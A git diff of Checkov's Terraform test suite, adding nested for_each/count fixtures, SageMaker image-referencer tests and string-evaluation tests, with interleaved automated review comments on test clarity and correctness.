diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf
new file mode 100644
index 00000000000..4e601f10af0
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf
@@ -0,0 +1,7 @@
+variable "file_map1_level1" {
+ type = map(string)
+}
+
+variable "file_map2_level1" {
+ type = map(string)
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf
new file mode 100644
index 00000000000..7e4ad692554
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+ for_each = var.file_map_level2
+ bucket = "your_bucket_name"
+ key = each.key
+ source = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf
new file mode 100644
index 00000000000..fc8b1ddfd9d
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf
@@ -0,0 +1,3 @@
+variable "file_map_level2" {
+ type = map(string)
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf
new file mode 100644
index 00000000000..da719081ea3
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf
@@ -0,0 +1,32 @@
+locals {
+ groups = {
+ "blue" = "blue"
+ "green" = "green"
+ }
+ files_map1 = {
+ "test1.txt" = "test1.txt"
+ "test2.txt" = "test2.txt"
+ }
+ files_map2 = {
+ "test3.txt" = "test3.txt"
+ "test4.txt" = "test4.txt"
+ }
+}
+
+# Expected resources:
+# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+
+module "level1" {
+ source = "./level1_module"
+ for_each = local.groups
+
+ file_map1_level1 = local.files_map1
+ file_map2_level1 = local.files_map2
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf
new file mode 100644
index 00000000000..20e13d97c6c
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf
@@ -0,0 +1,22 @@
+locals {
+ groups = {
+ "blue" = "blue"
+ "green" = "green"
+ }
+ files_map1 = {
+ "test1" = "test1"
+ "test2" = "test2"
+ }
+}
+
+# Expected resources:
+# module.files["blue"].aws_s3_bucket_object.this_file["test1.txt"]
+# module.files["blue"].aws_s3_bucket_object.this_file["test2.txt"]
+# module.files["green"].aws_s3_bucket_object.this_file["test1.txt"]
+# module.files["green"].aws_s3_bucket_object.this_file["test2.txt"]
+
+module "files" {
+ source = "./s3_files"
+ for_each = local.groups
+ file_map = local.files_map1
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf
new file mode 100644
index 00000000000..91db9c71cb6
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+ for_each = var.file_map
+ bucket = "your_bucket_name"
+ key = each.key
+ source = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf
new file mode 100644
index 00000000000..c7721cd54e3
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf
@@ -0,0 +1,3 @@
+variable "file_map" {
+ type = map(string)
+}
\ No newline at end of file
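Review bot: The "Expected resources" comment in `nested_foreach_based_on_module_locals/main.tf` lists keys `"test1.txt"` / `"test2.txt"`, but `files_map1` in the same file is keyed `"test1"` / `"test2"`, so the addresses the renderer should produce end in `this_file["test1"]` and `this_file["test2"]`. Align the comment with the local (or the local with the comment) so the fixture documents one unambiguous expectation.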
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf
new file mode 100644
index 00000000000..9164a57f720
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf
@@ -0,0 +1,11 @@
+## child/main.tf
+variable "child-name" {
+ type = string
+}
+resource "terraform_data" "child-example" {
+ input = "1"
+}
+output "child-result" {
+ value = terraform_data.child-example.output
+}
+
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf
new file mode 100644
index 00000000000..c451b5dced7
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf
@@ -0,0 +1,9 @@
+# modules.tf
+module "modules" {
+ count = 12
+ source = "./parent"
+ parent = count.index
+}
+output "modules-result" {
+ value = { for k, v in module.modules-parent : k => v }
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf
new file mode 100644
index 00000000000..1005ba13b48
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf
@@ -0,0 +1,12 @@
+# parent/main.tf
+variable "parent" {
+ type = string
+}
+module "parent" {
+ source = "../child"
+ child-name = "1"
+}
+
+output "parent-result" {
+ value = module.parent.child-result
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
index 036e507f094..9ddb2586686 100644
--- a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
+++ b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
@@ -387,6 +387,45 @@ def test_foreach_module_and_resource(checkov_source_path):
 assert graph.vertices[9].config['aws_s3_bucket_public_access_block']['var_bucket["b"]']['__address__'] == 'module.s3_module["b"].aws_s3_bucket_public_access_block.var_bucket["b"]'
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"})
+def test_foreach_data(checkov_source_path):
+ dir_name = 'data_simple'
+ graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+ tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name)
+
+ assert len([block for block in graph.vertices if block.block_type == 'data']) == 6
+ assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 6
+
+ data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data']
+ assert 'aws_s3_bucket.data_list["b"]' in data_vertices_names
+ assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names
+ assert 'aws_s3_bucket.data_count[0]' in data_vertices_names
+ assert 'aws_s3_bucket.data_list["a"]' in data_vertices_names
+ assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names
+ assert 'aws_s3_bucket.data_count[1]' in data_vertices_names
+
+
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"})
+def test_foreach_data_with_resource(checkov_source_path):
+ dir_name = 'data_with_resource'
+ graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+ tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name)
+
+ assert len([block for block in graph.vertices if block.block_type == 'data']) == 5
+ assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 5
+
+ data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data']
+ assert 'aws_s3_bucket.data_dict["key1"]' in 
data_vertices_names
+ assert 'aws_s3_bucket.data_count[0]' in data_vertices_names
+ assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names
+ assert 'aws_s3_bucket.data_count[1]' in data_vertices_names
+
+ assert graph.vertices[0].attributes['bucket'] == graph.vertices[3].attributes['bucket']
+ assert graph.vertices[1].attributes['bucket'] == graph.vertices[4].attributes['bucket']
+ assert graph.vertices[8].attributes['bucket'] == graph.vertices[10].attributes['bucket']
+ assert graph.vertices[9].attributes['bucket'] == graph.vertices[11].attributes['bucket']
+
+
 @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"})
 def test_foreach_module_with_more_than_two_resources(checkov_source_path):
 dir_name = 'foreach_module_with_more_than_two_resources'
@@ -422,6 +461,13 @@ def test_foreach_with_lookup():
 assert graph.vertices[1].attributes.get('uniform_bucket_level_access') == [True]
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"})
+def test_foreach_large_count_with_nested_module(checkov_source_path):
+ dir_name = 'os_example_large_count_with_nested_module'
+ graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+ assert len(graph.vertices) == 85
+
+
 def test__get_tf_module_with_no_foreach():
 module = TFModule(name='1', path='1', foreach_idx='1', nested_tf_module=TFModule(name='2', path='2', foreach_idx='2', nested_tf_module=None))
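Review bot: The four `graph.vertices[i].attributes['bucket']` comparisons at the end of test_foreach_data_with_resource pin vertex positions (0/3, 1/4, 8/10, 9/11) that depend on the order in which the graph builder emits vertices, so an unrelated ordering change would fail the test without any rendering regression. Looking the vertices up by name first, e.g. `by_name = {v.name: v for v in graph.vertices}` and then comparing `by_name['aws_s3_bucket.data_count[0]'].attributes['bucket']` with its resource counterpart, would state which data/resource pairs are expected to agree and make the test order-independent. In both new tests `list(tf_definitions.keys())[0]` builds a list only to take its first element; `next(iter(tf_definitions))` says the same thing.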
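Review bot: `assert len(graph.vertices) == 85` in test_foreach_large_count_with_nested_module gives no hint of where 85 comes from, so a failure after a renderer change cannot be judged without re-deriving the fixture by hand. From the fixture files (12 module instances plus one root output, and three blocks each in the parent and the child per instance) the count appears to be 12 + 1 + 12 * 3 + 12 * 3; a comment such as `# 12 module instances + 1 root output + 12 * (3 parent blocks + 3 child blocks)` would record that, provided it matches how the graph builder counts module vertices, which this hunk does not show.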
@@ -441,8 +487,89 @@ def test__get_module_with_only_relevant_foreach_idx():
 nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', nested_tf_module=None))
 result = ForeachModuleHandler._get_module_with_only_relevant_foreach_idx('test', original_key, module)
 assert result == TFModule(name='1', path='1', foreach_idx='1',
- nested_tf_module=TFModule(name='2', path='2', foreach_idx='test',
- nested_tf_module=TFModule(name='3', path='3', foreach_idx='3',
- nested_tf_module=None)
- )
- )
+ nested_tf_module=TFModule(name='2', path='2', foreach_idx='test',
+ nested_tf_module=TFModule(name='3', path='3', foreach_idx='3',
+ nested_tf_module=None)
+ )
+ )
+
+def test_nested_foreach_with_variable_reference():
+ """
+ Here we test that a nested foreach loop based on module locals is correctly rendered in the Terraform graph.
+ """
+ resources_by_group_local_var = 2
+ resources_by_files_local_var = 2
+
+ dir_name = 'foreach_examples/nested_foreach_based_on_module_locals'
+ graph = build_and_get_graph_by_path(dir_name)[0]
+ graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+ graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+ assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var)
+ assert graph_resources_created == ['module.files["blue"].aws_s3_bucket_object.this_file["test1"]',
+ 'module.files["green"].aws_s3_bucket_object.this_file["test1"]',
+ 'module.files["blue"].aws_s3_bucket_object.this_file["test2"]',
+ 'module.files["green"].aws_s3_bucket_object.this_file["test2"]']
+
+
+def test_double_nested_foreach_with_variable_reference():
+ """
+ Here we test that a 2 level nested foreach loop based on module local vars is correctly rendered in the Terraform graph.
+
+ In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt)
+ and 2 resources for each (test3.txt, test4.txt).
+ So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource).
+
+ The unique use case is that the for_each attributes depends on the main module's local variables.
+ """
+ dir_name = 'foreach_examples/module_foreach_module_foreach_resource_foreach'
+ graph = build_and_get_graph_by_path(dir_name)[0]
+
+ graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices)
+ graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter))
+
+ graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+ graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+ assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6)
+ assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8)
+
+ assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+ 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+ 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+ 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+ 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+ 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+ 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+ 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]']
+
+
+def test_double_nested_foreach_and_count_with_variable_reference():
+ """
+ Here we test that a 2 level nested foreach loop and count based on module locals is correctly rendered in the Terraform graph.
+ In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt)
+ and 2 resources for each (count of 2).
+ So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource: count = 2).
+
+ The unique use case is that the count and for_each attributes (multiple levels) depends on the main module's local variables.
+ """
+ dir_name = 'count_examples/module_foreach_module_foreach_resource_count'
+ graph = build_and_get_graph_by_path(dir_name)[0]
+
+ graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices)
+ graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter))
+
+ graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+ graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+ assert len(graph_modules_created) is 6 # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6)
+ assert len(graph_resources_created) is 8 # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8)
+
+ assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]',
+ 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]',
+ 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]',
+ 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]',
+ 'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]',
+ 'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]',
+ 'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]',
+ 'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]']
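Review bot: `assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var)` in test_nested_foreach_with_variable_reference, and the `is 6` / `is 8` assertions in the two tests that follow, compare integers by identity; that only passes because CPython interns small ints, and `is` with a literal is a SyntaxWarning on Python 3.8+. All five should use equality, e.g. `assert len(graph_modules_created) == 6`. The `filter`/`map` lambda pairs that build the address lists would also read more directly as comprehensions, e.g. `[v.attributes['__address__'] for v in graph.vertices if v.block_type == 'resource']`, which is a style point only.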
diff --git a/tests/terraform/graph/variable_rendering/test_string_evaluation.py b/tests/terraform/graph/variable_rendering/test_string_evaluation.py
index e10b4b41d4e..97a64f308c8 100644
--- a/tests/terraform/graph/variable_rendering/test_string_evaluation.py
+++ b/tests/terraform/graph/variable_rendering/test_string_evaluation.py
@@ -10,6 +10,11 @@ class TestTerraformEvaluation(TestCase):
+ def test_zipmap(self):
+ input_str = '"zipmap(["a", "b"], [1, 2])"'
+ expected = {'a': 1, 'b': 2}
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
 def test_directive(self):
 input_str = '"Hello, %{ if "d" != "" }named%{ else }unnamed%{ endif }!"'
 expected = 'Hello, named!'
@@ -24,6 +29,27 @@ def test_condition(self):
 expected = 'smaller'
 self.assertEqual(expected, evaluate_terraform(input_str).strip())
+ def test_conditional_expression(self):
+ input_str = '"[\'${blocked == "allowed" ? True : False}\']"'
+ expected = False
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
+ input_str = '${blocked == "allowed" ? True : False}'
+ expected = False
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
+ input_str = 'blocked == "allowed" ? True : False'
+ expected = False
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
+ input_str = 'True == "true" ? True : False'
+ expected = True
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
+ input_str = 'False != "false" ? True : False'
+ expected = False
+ self.assertEqual(expected, evaluate_terraform(input_str))
+
 def test_format(self):
 input_str = '"format("Hello, %s!", "Ander")"'
 expected = 'Hello, Ander!'
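Review bot: In test_conditional_expression the cases `'True == "true" ? True : False'` expecting True and `'False != "false" ? True : False'` expecting False pin down that the evaluator treats a boolean and its lowercase string spelling as equal, but nothing in the test says this is the intended contract rather than an artefact being frozen; a comment above those two cases, e.g. `# a bool and its lowercase string form compare equal after evaluation`, would make that explicit. The five input/expected pairs run as one assertion sequence, so only the first failure is reported; wrapping each in `with self.subTest(input_str=input_str):` would name the failing case.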
@@ -479,6 +505,18 @@ def test_base64_value(self): expected = ["dGVzdA=="] self.assertEqual(expected, evaluate_terraform(input_str)) + def test_try_block(self): + input_str = 'try("local.foo.boop", "{}")' + expected = {} + result = evaluate_terraform(input_str) + self.assertEqual(expected, result) + + def test_try_then_merge_block(self): + input_str = "try((merge({}, {})), 1, 2)" + expected = {} + result = evaluate_terraform(input_str) + self.assertEqual(expected, result) + @pytest.mark.parametrize( "origin_str,str_to_replace,new_value,expected", diff --git a/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf b/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf new file mode 100644 index 00000000000..f650086490e --- /dev/null +++ b/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf @@ -0,0 +1,4 @@ +resource "aws_sagemaker_image_version" "test" { + image_name = "name" + base_image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image:latest" +} \ No newline at end of file diff --git a/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf b/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf new file mode 100644 index 00000000000..02a1765b90f --- /dev/null +++ b/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf @@ -0,0 +1,17 @@ +resource "aws_sagemaker_model" "example1" { + name = "my-model" + execution_role_arn = "arn:aws:iam::123456789012:role/SageMakerExecutionRole" + + primary_container { + image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image1:latest" + } +} + +resource "aws_sagemaker_model" "example2" { + name = "my-model" + execution_role_arn = "arn:aws:iam::123456789012:role/SageMakerExecutionRole" + + container { + image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image2:latest" + } +} 
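Review bot: test_try_block expects `try("local.foo.boop", "{}")` to evaluate to `{}` (a dict), which implies both that the unresolved `local.foo.boop` drops through to the fallback and that the fallback literal `"{}"` is itself evaluated rather than returned as a string; neither expectation is stated, so the test reads as if the dict result were incidental. A short comment, e.g. `# unresolved local falls back to the second argument, which is evaluated in turn`, would document the contract, and a parallel comment on test_try_then_merge_block would note that there the first argument already succeeds so the later arguments are never reached.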
diff --git a/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf b/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
index f2609fb3073..2bbbde5a054 100644
--- a/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
+++ b/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
@@ -35,7 +35,7 @@ resource "google_cloudbuild_trigger" "build-trigger" {
 secret {
 kms_key_name = "projects/myProject/locations/global/keyRings/keyring-name/cryptoKeys/key-name"
 secret_env = {
- PASSWORD = "ZW5jcnlwdGVkLXBhc3N3b3JkCg==" # checkov:skip=CKV_SECRET_6 test secret
+ PASSWORD = "ZW5jcnlwdGVkLXBhc3N3b3JkCg==" # checkov:skip=CKV_SECRET_6 test secret # checkov:skip=CKV_SECRET_80 test secret
 }
 }
 available_secrets {
diff --git a/tests/terraform/image_referencer/test_runner_aws_resources.py b/tests/terraform/image_referencer/test_runner_aws_resources.py
index 6507ea622bf..8c72803e15c 100644
--- a/tests/terraform/image_referencer/test_runner_aws_resources.py
+++ b/tests/terraform/image_referencer/test_runner_aws_resources.py
@@ -251,3 +251,88 @@ def test_lightsail_resources(mocker: MockerFixture, graph_framework):
 assert len(sca_image_report.failed_checks) == 3
 assert len(sca_image_report.skipped_checks) == 0
 assert len(sca_image_report.parsing_errors) == 0
+
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_image_version_resources(mocker: MockerFixture, graph_framework):
+ file_name = "sagemaker_image_version.tf"
+ base_image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image:latest"
+ code_lines = "1-4"
+ test_file = RESOURCES_PATH / file_name
+ runner_filter = RunnerFilter(run_image_referencer=True)
+
+ mocker.patch(
+ "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+ side_effect=mock_get_image_cached_result_async,
+ )
+ mocker.patch(
+ "checkov.common.images.image_referencer.get_license_statuses_async",
+ side_effect=mock_get_empty_license_statuses_async,
+ )
+
+ # when
+ with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+ reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+ # then
+ assert len(reports) == 2
+ tf_report = next(report for report in reports if report.check_type == CheckType.TERRAFORM)
+ sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+ assert len(tf_report.resources) == 1
+ assert len(tf_report.passed_checks) == 0
+ assert len(tf_report.failed_checks) == 0
+ assert len(tf_report.skipped_checks) == 0
+ assert len(tf_report.parsing_errors) == 0
+
+ assert len(sca_image_report.resources) == 1
+ assert sca_image_report.resources == {f"{file_name} ({base_image} lines:{code_lines} (sha256:2460522297)).go"}
+ assert len(sca_image_report.passed_checks) == 0
+ assert len(sca_image_report.failed_checks) == 3
+ assert len(sca_image_report.skipped_checks) == 0
+ assert len(sca_image_report.parsing_errors) == 0
+
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_model_resources(mocker: MockerFixture, graph_framework):
+ file_name = "sagemaker_model.tf"
+ image_1 = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image1:latest"
+ image_2 = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image2:latest"
+ code_lines_1 = "1-8"
+ code_lines_2 = "10-17"
+ test_file = RESOURCES_PATH / file_name
+ runner_filter = RunnerFilter(run_image_referencer=True)
+
+ mocker.patch(
+ "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+ side_effect=mock_get_image_cached_result_async,
+ )
+ mocker.patch(
+ "checkov.common.images.image_referencer.get_license_statuses_async",
+ side_effect=mock_get_empty_license_statuses_async,
+ )
+
+ # when
+ with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+ reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+ # then
+ assert len(reports) == 2
+ tf_report = next(report for report in reports if report.check_type == CheckType.TERRAFORM)
+ sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+ assert len(tf_report.resources) == 2
+ assert len(tf_report.passed_checks) == 0
+ assert len(tf_report.failed_checks) == 2
+ assert len(tf_report.skipped_checks) == 0
+ assert len(tf_report.parsing_errors) == 0
+
+ assert len(sca_image_report.resources) == 2
+ assert sca_image_report.resources == {
+ f"{file_name} ({image_1} lines:{code_lines_1} (sha256:2460522297)).go",
+ f"{file_name} ({image_2} lines:{code_lines_2} (sha256:2460522297)).go",
+ }
+ assert len(sca_image_report.passed_checks) == 0
+ assert len(sca_image_report.failed_checks) == 6
+ assert len(sca_image_report.skipped_checks) == 0
+ assert len(sca_image_report.parsing_errors) == 0
\ No newline at end of file
diff --git a/tests/terraform/module_loading/data/tf_managed_modules/main.tf b/tests/terraform/module_loading/data/tf_managed_modules/main.tf
index 7f2f3164886..73eef8634f3 100644
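Review bot: test_sagemaker_image_version_resources and test_sagemaker_model_resources repeat the same two `mocker.patch(...)` calls, the `Runner().run(...)` call under `mock.patch.dict('os.environ', ...)` and the report splitting by `check_type`; the context line at the top of the hunk suggests the earlier tests in this file (outside the hunk) follow the same shape. A small helper, e.g. `_run_image_referencer(mocker, graph_framework, file_name)` returning `(tf_report, sca_image_report)`, would reduce each test to its expectations and make the values that actually differ (`code_lines`, `failed_checks == 3` versus `6`) stand out. The `sha256:2460522297` fragment in the expected resource keys presumably comes from the mocked cache result rather than from the image string; a one-line comment saying so would spare the next reader from looking for it in the fixture.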
--- a/tests/terraform/module_loading/data/tf_managed_modules/main.tf +++ b/tests/terraform/module_loading/data/tf_managed_modules/main.tf @@ -12,3 +12,22 @@ module "log_group_v4" { name_prefix = "my-log-group-" retention_in_days = 7 } + +#NOTE - THIS IS COMMENTED AS PART OF THE TEST TO CHECK HANDLING OF COMMENTED OUT MODULES. DO NOT DELETE +# Need to verify this type of comment is not an issue. +#module "log_group_pound_comment" { +# source = "terraform-aws-modules/cloudwatch/aws//modules/log-group" +# +# name_prefix = "my-log-group-" +# retention_in_days = 7 +#} + + +# Need to verify this type of comment is not an issue. +/* +module "log_group_star_comment" { + source = "terraform-aws-modules/cloudwatch/aws//modules/log-group" + name_prefix = "my-log-group-" + retention_in_days = 7 +} +*/ \ No newline at end of file diff --git a/tests/terraform/module_loading/test_tf_module_finder.py b/tests/terraform/module_loading/test_tf_module_finder.py index 867fcc947c0..847ba62bbbd 100644 --- a/tests/terraform/module_loading/test_tf_module_finder.py +++ b/tests/terraform/module_loading/test_tf_module_finder.py @@ -52,7 +52,7 @@ def test_downloader(self): @mock.patch.dict(os.environ, {"CHECKOV_EXPERIMENTAL_TERRAFORM_MANAGED_MODULES": "True"}) -def test_tf_managed_modules(): +def test_tf_managed_and_comment_out_modules(): # this test leverages the modules, which Terraform downloads on its own # given diff --git a/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf b/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf new file mode 100644 index 00000000000..52d924d3afd --- /dev/null +++ b/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf @@ -0,0 +1,4 @@ +module "s3-bucket-1" { + source = "terraform-aws-modules/s3-bucket/aws" + version = "4.0.1" +} 
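Review bot: The module in s3module.tf is declared as `module "s3-bucket-1"`, while every address in the companion tfplan.json hunk that follows (which continues past this view) is `module.s3-bucket`, so the two fixture files do not describe the same configuration; if the parser test relies on mapping the plan's module address back to the HCL, the names need to agree, and if the mismatch is intended it deserves a comment in s3module.tf. Separately, the plan's prior_state and provider_config sections carry what look like values captured from a live account (an account ID, an IAM user ARN and user ID, and a named profile); fixtures checked into the repository should have these replaced with obviously fake placeholders, as the sagemaker fixtures in this same change do with `123456789012`.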
diff --git a/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json b/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json
new file mode 100644
index 00000000000..304c9ef79cb
--- /dev/null
+++ b/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json
